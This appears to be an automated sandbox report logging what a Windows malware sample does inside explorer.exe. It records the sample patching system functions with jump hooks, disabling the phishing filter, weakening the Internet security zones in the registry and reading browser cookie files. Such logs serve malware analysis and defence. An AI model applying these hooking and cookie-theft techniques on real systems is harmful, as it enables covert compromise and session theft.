+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 618 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2 1493DBB
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 14A8925
+ Chronological sections
Operation Data Completion Time
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 26D0000 Length: 29FF8C8 Allocation Type: null Protection: page read and write success or wait 2629492827
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 26D0000 Length: 29FF8CC Allocation Type: null Protection: page read and write success or wait 2629495081
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2629622961
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2629633779
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2629639392
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 Type: Dword Data: 0 Old data: 1 success or wait 2629644633
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: CleanCookies Type: Dword Data: 0 success or wait 2629719029
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1406 success or wait 2629719918
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1609 success or wait 2629757655
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629762578
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1406 success or wait 2629778719
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 Type: Dword Data: 0 Old data: 1 success or wait 2629782291
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 success or wait 2629785188
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629790162
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 success or wait 2629792043
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629800301
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 success or wait 2629815114
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629822075
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 success or wait 2629822628
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629825652
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 success or wait 2629829448
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629834200
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 success or wait 2629834761
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629835960
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 success or wait 2629836532
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629848816
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 29FF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2629851899
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629856233
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2629856944
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 9D 7B success or wait 2629860570
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE B8 84 success or wait 2629873842
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629874165
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629877561
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2629877896
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 9E 7B success or wait 2629881609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 5 Value: E9 09 1F B8 84 success or wait 2629887786
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629888106
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629890370
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2629890690
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 2E 76 success or wait 2629900807
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 5 Value: E9 FD 4B 27 8A success or wait 2629901724
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629902048
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629902897
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2629904045
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 29 76 success or wait 2629905072
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A 2C 8A success or wait 2629905986
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629906309
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629908558
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2629908864
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 29 76 success or wait 2629909951
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 2B 8A success or wait 2629910862
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629911184
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629912217
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2629912521
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 2E 76 success or wait 2629918508
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C 27 8A success or wait 2629921186
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629921860
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629924260
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2629926078
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 29 76 success or wait 2629932929
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 5 Value: E9 25 2F 2C 8A success or wait 2629938255
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629938644
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629940960
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2629942306
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 29 76 success or wait 2629944504
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 5 Value: E9 0A FA 2B 8A success or wait 2629945456
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629945775
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629947211
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2629948664
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 2C 76 success or wait 2629951297
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 5 Value: E9 34 EC 28 8A success or wait 2629956328
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629958568
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629963659
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2629964372
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 2A 76 success or wait 2629966383
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 2A 8A success or wait 2629971247
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629972143
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629976391
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2629978609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 29 76 success or wait 2629984519
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 2C 8A success or wait 2629991520
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629993757
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629997075
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2629999278
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 2C 76 success or wait 2630012766
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 28 8A success or wait 2630018909
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630019967
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630024169
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2630026393
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 2A 76 success or wait 2630033368
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 5 Value: E9 BB ED 2A 8A success or wait 2630039075
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630041320
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630046723
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2630048934
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 28 76 success or wait 2630054931
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC 2C 8A success or wait 2630061113
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630062003
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630064708
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2630066907
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D B8 70 success or wait 2630075188
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 9D 8F success or wait 2630083347
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630083674
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2630085769
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2630092807
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2630120051
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2630140943
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2630159862
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2630167181
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2630190091
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2630212330
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2630218971
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2630238180
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2630246991
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2630250586
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2630254822
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2630258321
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2630262494
System info queried Type: ProcessInformation success or wait 2630626183
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2630635473
Thread created PID: 1520 TID: 536 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2631096106
Mutant created Name: \BaseNamedObjects\Global\{41836DC6-D3BA-F066-FB56-FD56EA1DDE44} success or wait 2631099496
Thread delayed Time: 15 TID: 1334 success or wait 2631100946
System info queried Type: ProcessInformation success or wait 2631103515
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2631110520
Thread created PID: 1520 TID: 168 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2631451983
Mutant created Name: \BaseNamedObjects\Global\{97855BF5-E589-2660-FB56-FD56EA1DDE44} success or wait 2631458002
System info queried Type: ProcessInformation success or wait 2631460900
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2631467923
Thread created PID: 1520 TID: 1920 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632232221
Mutant created Name: \BaseNamedObjects\Global\{9B698CC0-32BC-2A8C-FB56-FD56EA1DDE44} success or wait 2632234818
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632235794
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632236352
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 18457c7d object name not found 2632237031
System info queried Type: ProcessInformation success or wait 2632237889
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632245550
Thread created PID: 1520 TID: 1448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632594590
Mutant created Name: \BaseNamedObjects\Global\{9B698CC7-32BB-2A8C-FB56-FD56EA1DDE44} success or wait 2632596776
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2632597772
Mutant created Name: \BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2632599006
System info queried Type: ProcessInformation success or wait 2632601556
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632609101
File moved New path: unknown Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2632613869
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632630281
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632653113
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 18457c7d object name not found 2632659690
Thread created PID: 1520 TID: 1100 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632920768
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} success or wait 2632923138
System info queried Type: ProcessInformation success or wait 2632925507
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632932449
Thread created PID: 1520 TID: 1716 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2633095320
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} success or wait 2633097511
System info queried Type: ProcessInformation success or wait 2633100480
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2633108455
Thread created PID: 1520 TID: 508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2633260445
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2633262441
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 object name not found 2633262995
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633274679
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633277180
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Offset: none Length: 169 Value: 75 0A 34 65 64 37 66 30 66 62 63 37 62 36 64 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 31 30 32 34 0A 34 32 31 34 36 35 36 0A 33 30 31 39 37 39 36 34 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 69 5F 31 0A 33 33 3A 32 33 37 33 3A 31 32 32 35 3A 30 3A 30 3A 35 37 37 32 35 3A 31 success or wait 2633277480
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633279707
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633282702
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt Offset: none Length: 228 Value: 75 69 64 0A 34 65 64 37 65 36 61 30 38 34 33 62 62 61 64 63 0A 61 64 64 74 68 69 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 39 32 39 32 36 34 38 39 36 0A 33 30 33 33 38 37 37 34 0A 34 36 35 35 31 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 75 76 63 0A 33 7C 34 38 0A 61 64 64 74 68 69 success or wait 2633283009
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633285066
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633287573
